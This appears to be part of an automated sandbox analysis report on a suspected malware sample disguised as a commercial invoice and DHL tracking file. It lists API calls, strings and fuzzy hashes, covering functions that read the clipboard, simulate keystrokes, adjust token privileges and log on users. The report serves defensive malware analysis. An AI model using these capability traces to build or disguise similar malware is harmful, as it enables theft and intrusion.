Function 01241CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 01241CBC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 06409b6bdb2c2b544d805b5da96d95bb00b4a72ae77a89b708ec75ab4aaf9469
Instruction ID: 4b4b7daac4c762b4d805a2c6ef476385702a4c63792ab7a3b04be4903bf6688b
Opcode Fuzzy Hash: 06409b6bdb2c2b544d805b5da96d95bb00b4a72ae77a89b708ec75ab4aaf9469
Instruction Fuzzy Hash: 9FC09236280304EFF6358A90FC8EF51BB68E348B00F548501F70AA95CFC3A21820EB50

Function 0129D8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0129D8E9

Part of subcall function 012433A7: _wcslen.LIBCMT ref: 012433AB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: PathTemp_wcslen
String ID:
API String ID: 1974555822-0
Opcode ID: 2015a6853e44e2d2a16b8c579f6b100f7f9c600f261ffe129a54d40984acf9cb
Instruction ID: 7dd686eecebf29d83a5f34a1178fe8e1befe24e19a06e96e49c8d03e9455d15f
Opcode Fuzzy Hash: 2015a6853e44e2d2a16b8c579f6b100f7f9c600f261ffe129a54d40984acf9cb
Instruction Fuzzy Hash: B3C04C7492501A9BDB94A794D9CDAB87724FF10301F0040D5E14951044DE7059448B11

Function 012B744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 01245745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01245773

GetLastError.KERNEL32(00000002,00000000), ref: 012B76DE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 417d0ad7afe64e124f20add980f34ba3938b9dae7e046b181468b1bbe1a4a06b
Instruction ID: 38d2746e244ea9edca01869db277479ac173c1b26963e5eedaca1315be4f3fdc
Opcode Fuzzy Hash: 417d0ad7afe64e124f20add980f34ba3938b9dae7e046b181468b1bbe1a4a06b
Instruction Fuzzy Hash: 5A8190306243029FCB19EF28C4D0BB9B7E1BF99754F04452DE9965B2D1DB30E945CB92

Function 0125FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0125FD1F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 426054b6cf9a494ab203b005f182ad172db7914a4864e5119ce8c04eb33b520a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: DE312274A201069BD798CF19D2C0969FBA2FF49300B6486A5EA09CF656D731EDC0CBC0

Function 001B22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 001B22B1

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 258db18cf3d3aac4e3131d55085d35c1013e1a3535291ef837822504da26b049
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 36E0BF7494010E9FDB00EFA4D5496AE7BB4EF04301F1002A1FD01D2280D73099508A62

Non-executed Functions

Function 012D9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 012D961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 012D965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 012D969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 012D96C9
SendMessageW.USER32 ref: 012D96F2
GetKeyState.USER32(00000011), ref: 012D978B
GetKeyState.USER32(00000009), ref: 012D9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 012D97AE
GetKeyState.USER32(00000010), ref: 012D97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 012D97E9
SendMessageW.USER32 ref: 012D9810
SendMessageW.USER32(?,00001030,?,012D7E95), ref: 012D9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 012D992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 012D9941
SetCapture.USER32(?), ref: 012D994A
ClientToScreen.USER32(?,?), ref: 012D99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 012D99BC
InvalidateRect.USER32(?,00000000,00000001), ref: 012D99D6
ReleaseCapture.USER32 ref: 012D99E1
GetCursorPos.USER32(?), ref: 012D9A19
ScreenToClient.USER32(?,?), ref: 012D9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 012D9A80
SendMessageW.USER32 ref: 012D9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 012D9AEB
SendMessageW.USER32 ref: 012D9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 012D9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 012D9B4A
GetCursorPos.USER32(?), ref: 012D9B68
ScreenToClient.USER32(?,?), ref: 012D9B75
GetParent.USER32(?), ref: 012D9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 012D9BFA
SendMessageW.USER32 ref: 012D9C2B
ClientToScreen.USER32(?,?), ref: 012D9C84
TrackPopupMenuEx.USER32 ref: 012D9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 012D9CDE
SendMessageW.USER32 ref: 012D9D01
ClientToScreen.USER32(?,?), ref: 012D9D4E
TrackPopupMenuEx.USER32 ref: 012D9D82

Part of subcall function 01259944: GetWindowLongW.USER32(?,000000EB), ref: 01259952

GetWindowLongW.USER32(?,000000F0), ref: 012D9E05

Strings

F, xrefs: 012D9D07
@GUI_DRAGID, xrefs: 012D997D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: f8d1e909ba7376b4035e84bd0cf891b9db46777d1f0a05e70f561dd05e3e7610
Instruction ID: f3234fa57637a76dc6a8f3eb04aa9f1486f4ab0e06279d72ae45a29204d5a195
Opcode Fuzzy Hash: f8d1e909ba7376b4035e84bd0cf891b9db46777d1f0a05e70f561dd05e3e7610
Instruction Fuzzy Hash: D442A034615242AFEB25CF28C848AAABBF5FF49318F00061DF755972A1D771E8A0CF81

Function 012D4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 012D48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 012D4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 012D4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 012D494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 012D495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 012D497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 012D49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 012D49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 012D4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 012D4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 012D4A7E
IsMenu.USER32(?), ref: 012D4A97
GetMenuItemInfoW.USER32 ref: 012D4AF2
GetMenuItemInfoW.USER32 ref: 012D4B20
GetWindowLongW.USER32(?,000000F0), ref: 012D4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 012D4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 012D4C82
wsprintfW.USER32 ref: 012D4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 012D4CC9
GetWindowTextW.USER32 ref: 012D4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 012D4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 012D4D33
GetWindowTextW.USER32 ref: 012D4D5A

Strings

%d/%02d/%02d, xrefs: 012D4CA8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 6407d17433e4b0e157951140c128d041a3542a0777736018d9e6250a82e3d525
Instruction ID: 2480aec2c3ce13baedd0f5540fc1bcc23f1667622e787827b7a7c943f1818a53
Opcode Fuzzy Hash: 6407d17433e4b0e157951140c128d041a3542a0777736018d9e6250a82e3d525
Instruction Fuzzy Hash: C112F231920295AFEB25AF28DC49FBE7BF8EF85710F004159FA15EA6D0DBB49940CB50

Function 0125F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0125F998
FindWindowW.USER32 ref: 0129F474
IsIconic.USER32(00000000), ref: 0129F47D
ShowWindow.USER32(00000000,00000009), ref: 0129F48A
SetForegroundWindow.USER32(00000000), ref: 0129F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0129F4AA
GetCurrentThreadId.KERNEL32 ref: 0129F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0129F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0129F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0129F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0129F4DE
SetForegroundWindow.USER32(00000000), ref: 0129F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0129F4F6
keybd_event.USER32 ref: 0129F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0129F50B
keybd_event.USER32 ref: 0129F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0129F519
keybd_event.USER32 ref: 0129F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0129F528
keybd_event.USER32 ref: 0129F52D
SetForegroundWindow.USER32(00000000), ref: 0129F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0129F557

Strings

Shell_TrayWnd, xrefs: 0129F46F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b05247e695b21cb02fe7342b40c243774b5db9f7eb9ec26ff49fac827967eb2f
Instruction ID: 99476c80ab6edc023719edab8ae7216c74518ad3cad92ead5339f0033c9d54c3
Opcode Fuzzy Hash: b05247e695b21cb02fe7342b40c243774b5db9f7eb9ec26ff49fac827967eb2f
Instruction Fuzzy Hash: DC314D71E51218BAEF316BB9AD4AFBF7E6CEB44B50F100059FA04F61C1C6B05910DBA0

Function 012A1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 012A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 012A170D
Part of subcall function 012A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 012A173A
Part of subcall function 012A16C3: GetLastError.KERNEL32 ref: 012A174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 012A1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 012A12A8
CloseHandle.KERNEL32(?), ref: 012A12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 012A12D1
GetProcessWindowStation.USER32 ref: 012A12EA
SetProcessWindowStation.USER32 ref: 012A12F4
OpenDesktopW.USER32 ref: 012A1310

Part of subcall function 012A10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,012A11FC), ref: 012A10D4
Part of subcall function 012A10BF: CloseHandle.KERNEL32(?), ref: 012A10E9

Strings

winsta0, xrefs: 012A12CC
default, xrefs: 012A130B
, xrefs: 012A125A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: b1dfdab53546eff71eb255ff2cac056579d2f542042efe57de0c41754e126a37
Instruction ID: f1c0d3d8ae40932261838a2ca02e90784f1e8c39e4c8d9a2863a4edf85d3b456
Opcode Fuzzy Hash: b1dfdab53546eff71eb255ff2cac056579d2f542042efe57de0c41754e126a37
Instruction Fuzzy Hash: EB81AB7191024AAFEF219FA8DC49FEE7FB9EF04714F144129FA10E6290D7309A64CB60

Function 012A0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 012A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 012A1114
Part of subcall function 012A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A1120
Part of subcall function 012A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A112F
Part of subcall function 012A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A1136
Part of subcall function 012A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 012A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 012A0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 012A0C00
GetLengthSid.ADVAPI32(?), ref: 012A0C17
GetAce.ADVAPI32(?,00000000,?), ref: 012A0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 012A0C6D
GetLengthSid.ADVAPI32(?), ref: 012A0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 012A0C8C
HeapAlloc.KERNEL32(00000000), ref: 012A0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 012A0CB4
CopySid.ADVAPI32(00000000), ref: 012A0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 012A0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 012A0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 012A0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A0D45
HeapFree.KERNEL32(00000000), ref: 012A0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A0D55
HeapFree.KERNEL32(00000000), ref: 012A0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A0D65
HeapFree.KERNEL32(00000000), ref: 012A0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 012A0D78
HeapFree.KERNEL32(00000000), ref: 012A0D7F

Part of subcall function 012A1193: GetProcessHeap.KERNEL32(00000008,012A0BB1,?,00000000,?,012A0BB1,?), ref: 012A11A1
Part of subcall function 012A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,012A0BB1,?), ref: 012A11A8
Part of subcall function 012A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,012A0BB1,?), ref: 012A11B7

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2d9a998961fca1386471c098db89285f13f007c19e6a9a9fd7d02bc1b5ca4bfc
Instruction ID: c2dfb3c2d90447e60dd66d26c3207a521a700d19569b8aa52503b7dcd4581bd6
Opcode Fuzzy Hash: 2d9a998961fca1386471c098db89285f13f007c19e6a9a9fd7d02bc1b5ca4bfc
Instruction Fuzzy Hash: 7B718E7291121AABEF10DFA4EC48FAEBBB9FF04311F444169FA14A7180D771A915CBA0

Function 012BEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(012DCC08), ref: 012BEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 012BEB37
GetClipboardData.USER32 ref: 012BEB43
CloseClipboard.USER32 ref: 012BEB4F
GlobalLock.KERNEL32 ref: 012BEB87
CloseClipboard.USER32 ref: 012BEB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 012BEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 012BEBC9
GetClipboardData.USER32 ref: 012BEBD1
GlobalLock.KERNEL32 ref: 012BEBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 012BEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 012BEC38
GetClipboardData.USER32 ref: 012BEC44
GlobalLock.KERNEL32 ref: 012BEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 012BEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 012BEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 012BECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 012BECF3
CountClipboardFormats.USER32 ref: 012BED14
CloseClipboard.USER32 ref: 012BED59

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 944e0f70cfcbc3fe70668d853b32aa5850fee25ba76ca1b6b6497aa8755a00f3
Instruction ID: 84bb3d803f3e3c6c3085918a5f4ce138e664f0745a40325e56fa8d1b3757c6c1
Opcode Fuzzy Hash: 944e0f70cfcbc3fe70668d853b32aa5850fee25ba76ca1b6b6497aa8755a00f3
Instruction Fuzzy Hash: 686102742142039FE314EF28D888FBA7BE8FF94744F09451DE65687291DB70E945CBA2

Function 012B698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 012B69BE
FindClose.KERNEL32(00000000), ref: 012B6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 012B6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 012B6A75

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 012B6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 012B6ADF

Strings

%02d, xrefs: 012B6C00, 012B6C0A, 012B6C5A, 012B6CAA, 012B6CFA, 012B6D4A
%4d, xrefs: 012B6BB1
%03d, xrefs: 012B6DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 012B6B32
%4d%02d%02d%02d%02d%02d, xrefs: 012B6B6A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: a868c1c38603408a3b20f0f6a1a929e911c77237bdb51232e504adebf8232055
Instruction ID: 3f5d38120336f284170ac59f9e1d61aafde4627f11de85b6e44277e936df0c7d
Opcode Fuzzy Hash: a868c1c38603408a3b20f0f6a1a929e911c77237bdb51232e504adebf8232055
Instruction Fuzzy Hash: 87D17EB2518301AFC714EBA4C885EBFB7ECAF98704F44491DF989C6190EB74DA44CB62

Function 012B9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 012B9663
GetFileAttributesW.KERNEL32(?), ref: 012B96A1
SetFileAttributesW.KERNEL32(?,?), ref: 012B96BB
FindNextFileW.KERNEL32(00000000,?), ref: 012B96D3
FindClose.KERNEL32(00000000), ref: 012B96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 012B96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 012B974A
SetCurrentDirectoryW.KERNEL32(01306B7C), ref: 012B9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 012B9772
FindClose.KERNEL32(00000000), ref: 012B977F
FindClose.KERNEL32(00000000), ref: 012B978F

Strings

*.*, xrefs: 012B96F5

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

